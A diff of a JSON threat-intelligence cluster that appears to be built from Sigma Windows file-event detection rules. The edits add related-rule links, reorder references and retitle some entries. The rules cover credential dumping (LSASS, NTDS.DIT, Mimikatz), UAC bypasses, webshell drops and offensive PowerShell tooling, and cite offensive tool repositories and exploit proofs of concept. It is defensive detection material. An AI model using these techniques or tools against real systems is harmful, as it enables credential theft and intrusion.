"ad7085ac-92e4-4b76-8ce2-276d2c0e68ef", "value": "CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum" }, @@ -24844,6 +31454,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "162ab1e4-6874-4564-853c-53ec3ab8be01", "value": "TeamViewer Remote Session" }, 
@@ -24874,6 +31493,43 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "02773bed-83bf-469f-b7ff-e676e7d78bab", "value": "BloodHound Collection Files" }, @@ -24924,6 +31580,15 @@ "attack.t1137" ] }, + "related": [ + { + "dest-uuid": "2c4d4e92-0ccf-4a97-b54c-86d662988a53", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0e20c89d-2264-44ae-8238-aeeaba609ece", "value": "Office Template Creation" }, @@ -24948,6 +31613,15 @@ "attack.t1195.001" ] }, + "related": [ + { + "dest-uuid": "191cc6af-1bb2-4344-ab5f-28e496638720", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "805c55d9-31e6-4846-9878-c34c75054fe9", "value": "Octopus Scanner Malware" }, @@ -24974,6 +31648,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "bb09dd3e-2b78-4819-8e35-a7c1b874e449", "value": "Inveigh Execution Artefacts" }, 
@@ -25000,6 +31683,15 @@ "attack.defense_evasion" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "409f8a98-4496-4aaa-818a-c931c0a8b832", "value": "Created Files by Microsoft Sync Center" }, @@ -25024,15 +31716,26 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2d367498-5112-4ae5-a06a-96e7bc33a211", "value": "Suspicious Binary Writes Via AnyDesk" }, { - "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut. If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder. Additionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.", + "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut.\nIf the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.\nAdditionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.\n", "meta": { "author": "Greg (rule)", "creation_date": "2022/07/21", - "falsepositive": "No established falsepositives", + "falsepositive": [ + "Unknown" + ], "filename": "file_event_win_ripzip_attack.yml", "level": "high", "logsource.category": "file_event", 
@@ -25042,12 +31745,12 @@ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ripzip_attack.yml" ], "tags": [ - "attack.t1547", - "attack.persistence" + "attack.persistence", + "attack.t1547" ] }, "uuid": "a6976974-ea6f-4e97-818e-ea08625c52cb", - "value": "RipZip Attack on Startup Folder" + "value": "Potential RipZip Attack on Startup Folder" }, { "description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.", @@ -25062,11 +31765,11 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", + "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc", + "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", - "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", - "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc", + "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_advanced_ip_scanner.yml" ], "tags": [ 
@@ -25123,11 +31826,20 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "68578b43-65df-4f81-9a9b-92f32711a951", "value": "UAC Bypass Using Windows Media Player - File" }, { - "description": "Detects the creation of known powershell scripts for exploitation", + "description": "Detects the creation of known offensive powershell scripts used for exploitation", "meta": { "author": "Markus Neis, Nasreddine Bencherchali, Mustafa Kaan Demir, Georg Lauenstein", "creation_date": "2018/04/07", 
@@ -25139,19 +31851,21 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ + "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", "https://github.com/nettitude/Invoke-PowerThIEf", + "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", + "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", + "https://github.com/PowerShellMafia/PowerSploit", + "https://github.com/HarmJ0y/DAMP", + "https://github.com/AlsidOfficial/WSUSpendu/", + "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", + "https://github.com/NetSPI/PowerUpSQL", "https://github.com/CsEnox/EventViewer-UACBypass", "https://github.com/S3cur3Th1sSh1t/WinPwn", - "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", - "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", - "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", - "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", - "https://github.com/NetSPI/PowerUpSQL", "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", - "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", - "https://github.com/AlsidOfficial/WSUSpendu/", - "https://github.com/PowerShellMafia/PowerSploit", + "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", + "https://github.com/samratashok/nishang", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_exploit_scripts.yml" ], "tags": [ @@ -25159,6 +31873,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", "value": "Malicious PowerShell Commandlets - FileCreation" }, @@ -25175,9 +31898,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html", "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", "https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html", + "https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop_suspicious.yml" ], "tags": [ @@ -25187,6 +31910,15 @@ "attack.t1505.003" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6b269392-9eba-40b5-acb6-55c882b20ba6", "value": "Suspicious File Drop by Exchange" }, @@ -25213,6 +31945,15 @@ "attack.t1505.003" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7280c9f3-a5af-45d0-916a-bc01cb4151c9", "value": "Suspicious MSExchangeMailboxReplication ASPX Write" }, 
@@ -25229,8 +31970,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/tifkin_/status/1321916444557365248", "https://twitter.com/rbmaslen/status/1321859647091970051", + "https://twitter.com/tifkin_/status/1321916444557365248", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_pcre_net_temp_file.yml" ], "tags": [ @@ -25238,6 +31979,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", "value": "PCRE.NET Package Temp Files" }, @@ -25290,6 +32040,43 @@ "attack.t1003.005" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1ecfdab8-7d59-4c98-95d4-dc41970f57fc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "6add2ab5-2711-4e9d-87c8-7a0be8531530", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8fbf3271-1ef6-4e94-8210-03c2317947f6", "value": "Cred Dump Tools Dropped Files" }, 
@@ -25316,6 +32103,15 @@ "attack.t1546.013" ] }, + "related": [ + { + "dest-uuid": "0f2c410d-d740-4ed9-abb1-b8f4a7faf6c3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b5b78988-486d-4a80-b991-930eff3ff8bf", "value": "PowerShell Profile Modification" }, @@ -25340,6 +32136,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9711de76-5d4f-4c50-a94f-21e4e8f8384d", "value": "Installation of TeamViewer Desktop" }, @@ -25365,6 +32170,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "93a19907-d4f9-4deb-9f91-aac4692776a6", "value": "UAC Bypass Using .NET Code Profiler on MMC" }, @@ -25381,8 +32195,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", "https://github.com/horizon3ai/CVE-2021-44077/blob/b7a48e25824e8ead95e028475c7fd0e107e6e6bf/exploit.py", + "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_44077_poc_default_files.yml" ], "tags": [ @@ -25414,6 +32228,15 @@ "attack.persistence" ] }, + "related": [ + { + "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", "value": "WMI Persistence - Script Event Consumer File Write" }, 
@@ -25439,6 +32262,15 @@ "attack.t1021.003" ] }, + "related": [ + { + "dest-uuid": "68a0c5ed-bee2-4513-830d-5b0d650139bd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2f7979ae-f82b-45af-ac1d-2b10e93b0baa", "value": "Potential DCOM InternetExplorer.Application DLL Hijack" }, @@ -25491,7 +32323,7 @@ "value": "Drop Binaries Into Spool Drivers Color Folder" }, { - "description": "Detects actions caused by the RedMimicry Winnti playbook", + "description": "Detects files dropped by Winnti as described in RedMimicry Winnti playbook", "meta": { "author": "Alexander Rausch", "creation_date": "2020/06/24", @@ -25503,7 +32335,7 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://redmimicry.com", + "https://redmimicry.com/posts/redmimicry-winnti/#dropper", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_redmimicry_winnti_filedrop.yml" ], "tags": [ @@ -25512,7 +32344,7 @@ ] }, "uuid": "130c9e58-28ac-4f83-8574-0a4cc913b97e", - "value": "RedMimicry Winnti Playbook Dropped File" + "value": "Potential Winnti Dropper Activity" }, { "description": "A general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file.", @@ -25527,8 +32359,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://threathunterplaybook.com/evals/apt29/detections/6.B.1_6392C9F1-D975-4F75-8A70-433DEDD7F622.html", "https://github.com/OTRF/detection-hackathon-apt29/issues/14", + "https://threathunterplaybook.com/evals/apt29/detections/6.B.1_6392C9F1-D975-4F75-8A70-433DEDD7F622.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_pfx_file_creation.yml" ], "tags": [ 
@@ -25536,6 +32368,15 @@ "attack.t1552.004" ] }, + "related": [ + { + "dest-uuid": "60b508a1-6a5e-46b1-821a-9f7b78752abf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "dca1b3e8-e043-4ec8-85d7-867f334b5724", "value": "Suspicious PFX File Creation" }, @@ -25553,8 +32394,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/klinix5/InstallerFileTakeOver", "https://www.zerodayinitiative.com/advisories/ZDI-21-1308/", + "https://github.com/klinix5/InstallerFileTakeOver", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_41379_msi_lpe.yml" ], "tags": [ @@ -25562,6 +32403,15 @@ "attack.t1068" ] }, + "related": [ + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3be82d5d-09fe-4d6a-a275-0d40d234d324", "value": "InstallerFileTakeOver LPE CVE-2021-41379 File Create Event" }, 
@@ -25590,20 +32440,22 @@ "value": "Mimikatz Kirbi File Creation" }, { - "description": "Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context", + "description": "Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.", "meta": { - "author": "frack113", + "author": "frack113, omkar72, oscd.community, Wojciech Lesicki", "creation_date": "2022/11/18", "falsepositive": [ - "Legitimate use" + "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675" ], "filename": "file_event_win_net_cli_artefact.yml", - "level": "medium", + "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/olafhartong/sysmon-modular/blob/fa1ae53132403d262be2bbd7f17ceea7e15e8c78/11_file_create/include_dotnet.xml", "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/", + "https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008", + "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html", + "https://github.com/olafhartong/sysmon-modular/blob/fa1ae53132403d262be2bbd7f17ceea7e15e8c78/11_file_create/include_dotnet.xml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml" ], "tags": [ 
@@ -25611,6 +32463,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e0b06658-7d1d-4cd3-bf15-03467507ff7c", "value": "NET CLR Binary Execution Usage Log Artifact" }, @@ -25627,8 +32488,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/splinter_code/status/1519075134296006662?s=12&t=DLUXH86WtcmG_AZ5gY3C6g", "https://twitter.com/orange_8361/status/1518970259868626944?s=20&t=RFXqZjtA7tWM3HxqEH78Aw", + "https://twitter.com/splinter_code/status/1519075134296006662?s=12&t=DLUXH86WtcmG_AZ5gY3C6g", "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml" ], @@ -25653,9 +32514,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html", "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", "https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html", + "https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop.yml" ], "tags": [ 
@@ -25677,8 +32538,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", + "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_adwind.yml" ], "tags": [ @@ -25687,6 +32548,22 @@ "attack.t1059.007" ] }, + "related": [ + { + "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1", "value": "Adwind RAT / JRAT File Artifact" }, @@ -25711,6 +32588,15 @@ "attack.t1137.003" ] }, + "related": [ + { + "dest-uuid": "a9e2cea0-c805-4bf8-9e31-f5f0513a3634", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c3edc6a5-d9d4-48d8-930e-aab518390917", "value": "Outlook Form Installation" }, 
@@ -25727,8 +32613,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", "https://github.com/deepinstinct/Lsass-Shtinkering", + "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_shtinkering.yml" ], "tags": [ @@ -25736,6 +32622,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6902955a-01b7-432c-b32a-6f5f81d8f625", "value": "LSASS Process Dump Artefact In CrashDumps Folder" }, @@ -25761,8 +32656,17 @@ "attack.t1003" ] }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6e2a900a-ced9-4e4a-a9c2-13e706f9518a", - "value": "Remote Credential Dump" + "value": "Potential Remote Credential Dumping Activity" }, { "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", 
@@ -25785,6 +32689,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0b9ad457-2554-44c1-82c2-d56a99c42377", "value": "Anydesk Temporary Artefact" }, @@ -25809,6 +32722,15 @@ "attack.t1047" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8d5aca11-22b3-4f22-b7ba-90e60533e1fb", "value": "Wmiexec Default Output File" }, @@ -25858,6 +32780,15 @@ "attack.t1546.002" ] }, + "related": [ + { + "dest-uuid": "ce4b7013-640e-48a9-b501-d0025a95f4bf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "97aa2e88-555c-450d-85a6-229bcd87efb8", "value": "Suspicious Screensaver Binary File Creation" }, @@ -25900,8 +32831,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_script_creation_by_office_using_file_ext.yml" ], "tags": [ @@ -25909,6 +32840,15 @@ "attack.execution" ] }, + "related": [ + { + "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4", "value": "Created Files by Office Applications" }, 
@@ -25933,6 +32873,15 @@ "attack.t1027.004" ] }, + "related": [ + { + "dest-uuid": "c726e0a2-a57a-4b7b-a973-d0f013246617", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e4a74e34-ecde-4aab-b2fb-9112dd01aed0", "value": "Dynamic C Sharp Compile Artefact" }, @@ -25942,7 +32891,7 @@ "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020/05/02", "falsepositive": [ - "An FP could be caused by legitimate application writing shortcuts for example. This folder should always be inspected to make sure that all the files in there are legitimate" + "FP could be caused by legitimate application writing shortcuts for example. This folder should always be inspected to make sure that all the files in there are legitimate" ], "filename": "file_event_win_startup_folder_file_write.yml", "level": "medium", @@ -25983,6 +32932,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7fff6773-2baa-46de-a24a-b6eec1aba2d1", "value": "UAC Bypass Using NTFS Reparse Point - File" }, @@ -25999,8 +32957,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", + "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1", "https://pentestlab.blog/tag/ntds-dit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_dit.yml" 
@@ -26010,6 +32968,15 @@ "attack.t1003.003" ] }, + "related": [ + { + "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4e7050dd-e548-483f-b7d6-527ab4fa784d", "value": "Suspicious NTDS.DIT Creation" }, @@ -26026,9 +32993,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/SecureAuthCorp/impacket/blob/7d2991d78836b376452ca58b3d14daa61b67cb40/impacket/examples/secretsdump.py#L2405", "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/post/windows/gather/ntds_grabber.rb", "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/data/post/powershell/NTDSgrab.ps1", + "https://github.com/SecureAuthCorp/impacket/blob/7d2991d78836b376452ca58b3d14daa61b67cb40/impacket/examples/secretsdump.py#L2405", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_exfil_tools.yml" ], "tags": [ @@ -26036,6 +33003,15 @@ "attack.t1003.003" ] }, + "related": [ + { + "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a", "value": "Suspicious NTDS Exfil Filename Patterns" }, @@ -26061,6 +33037,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e074832a-eada-4fd7-94a1-10642b130e16", "value": "SafetyKatz Default Dump Filename" }, 
